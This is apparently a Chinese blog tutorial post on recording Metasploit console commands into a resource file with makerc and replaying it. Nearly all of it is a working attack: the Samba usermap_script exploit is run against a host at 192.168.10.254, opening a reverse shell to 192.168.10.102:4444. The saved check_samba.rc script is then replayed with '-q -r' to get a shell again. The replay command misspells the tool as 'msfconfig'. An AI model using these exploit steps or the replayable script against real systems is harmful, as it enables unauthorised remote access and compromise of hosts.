0x09 录制简单攻击脚本
2018-12-06 本文已影响0人
Gatociego
通过makerc 来实现,就是简单的把键入到终端的命令记录下来,攻击无关的命令也会记录
msf > workspace book
[*] Workspace: book
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.10.123 00:0c:29:86:6d:33 Linux 2.6.X server
192.168.10.254 00:0c:29:7f:de:c9 Linux 2.6.X server
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5P2uS1mnOkS0zxL6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "5P2uS1mnOkS0zxL6\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:54428) at 2018-12-06 08:19:15 -0500
^Z
Background session 1? [y/N] y
# 执行这个一指令就会把从进入msfconsole的操作全部记录,在记录的文件中把不相关的指令删除就行了
msf exploit(multi/samba/usermap_script) > makerc check_samba.rc
[*] Saving last 14 commands to check_samba.rc ...
查看录制的内容
# cat check_samba.rc
# 脚本中有多余的操作可以自己动手删掉
workspace book
hosts
use exploit/multi/samba/usermap_script
show options
set rhost 192.168.10.254
exploit
如何使用录制的脚本
msfconfig -q -r check_samba.rc
-q 不要显示登陆之后metasploit那一长串花哨的标志
-r 后面接录制的脚本
# 结果如下
[*] Processing check_samba.rc for ERB directives.
resource (check_samba.rc)> workspace book
[*] Workspace: book
resource (check_samba.rc)> hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.10.122 00:0c:29:67:b8:28 Windows XP client
192.168.10.123 00:0c:29:86:6d:33 Linux 2.6.X server
192.168.10.128 00:0c:29:f7:89:a7 Windows XP client
192.168.10.254 00:0c:29:7f:de:c9 Linux 2.6.X server
resource (check_samba.rc)> use exploit/multi/samba/usermap_script
resource (check_samba.rc)> show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
resource (check_samba.rc)> set rhost 192.168.10.254
rhost => 192.168.10.254
resource (check_samba.rc)> exploit
[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xQRN0G6H4nZxw9Jr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xQRN0G6H4nZxw9Jr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:56845) at 2018-12-06 08:28:16 -0500
# 这里有已经有了一个目标终端了
